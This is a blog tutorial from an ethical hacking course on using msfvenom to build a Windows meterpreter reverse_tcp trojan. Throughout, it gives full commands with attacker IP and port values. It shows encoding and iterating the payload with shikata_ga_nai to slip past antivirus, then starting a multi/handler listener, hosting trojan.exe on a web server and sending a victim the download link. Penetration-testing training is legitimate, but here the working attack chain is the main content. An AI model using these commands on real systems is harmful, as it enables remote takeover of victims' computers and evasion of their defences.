MSFvenom replacement of MSFpayload and msfencode – Full guide

MODULE 13:- Metasploit Framework

  1. 6 Metasploit Modules – You should know
  2. MSFvenom replacement of MSFpayload and msfencode – Full guide
  3. 6 Techniques to analyze the vulnerability scan report in Metasploit
  4. How to use Metasploit for vulnerability scanning
  5. How to use metasploit pro in Kali Linux
  6. Creating Persistent Backdoor By Metasploit in Kali Linux
  7. Creating Trojan Horse (Encoded)By Using Msfpayload

Hello and welcome on my blog, I am reaching you with latest and knowledgeable post. As you know msfpayload was used to create payloads ( general called trojan /backdoor ) and msfencode was used to encode payloads for avoiding antivirus detection. you can read in my old post Creating Trojan Horse (Encoded)By Using Msfpayload but both of them msfpayload and msfencode have been removed from metasploit framework on june 8th 2015.

So what is now?

Answer is msfvenom

MSFvenom replacement of MSFpayload and msfencode image

In this article I will cover what is msfvenom, use of msfvenom, generate and encode payload by msfvenom, avoid bad characters by msfvenom, start multi handler server to listen trojan backdoor.

What is msfvenom ?

In simple word “msfvenom is a combination of msfpayload and msfencode. it is used to generate payloads and encode them as well.” Now you don’t have need to run two different commands to create payload and encode it. msfvenom comes default in metasploit, so you don’t need to install extra package in your system for more detail about metasploit https://www.metasploit.com/ and for Tutorial you read my metasploit guide  section.

Metasploit command line intereface msfconsole and GUI Armitage are preinstalled in Kali Linux current version Kali 2016.2 . I will describe the tutorial by using Kali Linux.

Let’s start using MSFvenom

In Kali Linux,  right click on the desktop desktop then click on the open terminal. New terminal window will be open type the following command

open terminal

#msfvenom -h

msfvenon help

How to generate a payload using MSFvenom

To generate a payload there are two switch must be use -p and -f. -p for payload and -f for output file format. You should know first which payload you are going to use. To print the available list of payload use -l

#msfvenom -l payloads

After selecting appropriate payload. Use the following code

#msfvenom -p <payload> -f <file format>

To know more about formats use the following code

#msfvenom –help-formats

fileformate in msfvenom

#msfvenom -p windows/meterpreter/reverse_tcp -f exe > PATH

Final code would be

#msfvenom -p windows/meterpreter/reverse_tcp -f exe > /root/Desktop/trojan.exe

Before execute final code you should know about payloads options to be used. You can see in the above code payload is for giving connection back to attacker. But it will not send back connection to attacker, reason, in this code options are not specified yet. So you must know about available options for windows/meterpreter/reverse_tcp. Go through the following code

#msfvenom –payload-options -p <payload >

payload ooptions in msfvenom

Now the code is

#msfvenom -p windows/meterpreter/reverse_tcp LHOST=[attacker IP] LPORT=[desired port] -f exe > root/Desktop/trojan.exe

#msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.100 LPORT=4444 -f exe > root/Desktop/trojan.exe

It’s a good news that your payload is ready, you can send this payload to victim machine and when the victim will execute this file he will be hacked. But this payload is well known and most of antivirus are aware about it. Antivirus will detect easily this code and will remove it. So what is next.

You can do the following things;

  1. Avoid  the bad character
  2. Encode the payload
  3. Iterations

How to avoid bad character from the payloads by using msfvenom

As you have seen in the help menu of msfvenom, -b flag to be used to avoid certain bad characters from the payload. Whne the -b switch is used, msfvenom find good encoder to encode the payload and avoid bad character automatically

 

Msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.104 LPORT=4444 -b ‘/x00’ -f exe > root/Desktop/trojan.exe

 

How to encode a payload by msfvenom

When you will use -b flag, payload will be encode automatic with good encoder. But if you still want to use a specific encoder then you can use -e [encoder name] code. You can use only available encoder with msfvenom. So first use the following code to know about available encoder

Msfvenom -l encoder

list of encoder in msfvenom

Your final code will be

#msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.104 LPORT=4444 -e x86/shikata_ga_nai -f exe > root/Desktop/trojan.exe

Iterations:

The number of times to encode the payload

#msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.104 LPORT=4444 -e x86/shikata_ga_nai -i 5 -f exe > root/Desktop/trojan.exe

Use architecture and platform for payload by msfvenom

-a <x64/x86> to be used for define architecture. and –platform for platform but first check available platform in metasploit.

msfvenom –help-platforms

msfvenom platform

#msfvenom -a x86 –platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.1.104 LPORT=4444 -e x86/shikata_ga_nai -i 5 -f exe > root/Desktop/trojan.exe

create a payload and send to victim

Start multihandler server on attacker machine

Trojan will be executed on victim’s machine and it will send a back connection to attacker machine. So attacker must have a listener server on its machine. You can start multi handler server on your attacker machine by following instruction

#msfconsole

msf>use exploit/multi/handler

>set payload windows/meterpreter/reverse_tcp

>set LHOST 192.168.56.100 [attacker IP]

>set LPORT 4444

>exploit

start multi handler server on attacker machine
This is very important phase. you have created trojan.exe and started multi/handler server, Next step send to victim machine. I started apache2 web server and moved trojan.exe /var/www/html. and I have forwarded port 80 to my attacker machine on router. and I send link http://AttackerIP/trojan.exe. Victim download trojan and execute it. the session will be created

session opend

ONLINE COURSES - SELF STUDY

Ethical Hacking Bootcamp

Python Tutorial - Build 7 Apps

Ethical Hacking A to Z Bundle

Ethical Hacking: Beginner to Adv.

Vijay Kumar

Ethical Hacking & Penetration Testing Trainer, For more detail view My Profile

6 thoughts on “MSFvenom replacement of MSFpayload and msfencode – Full guide

Leave a Reply

Your email address will not be published. Required fields are marked *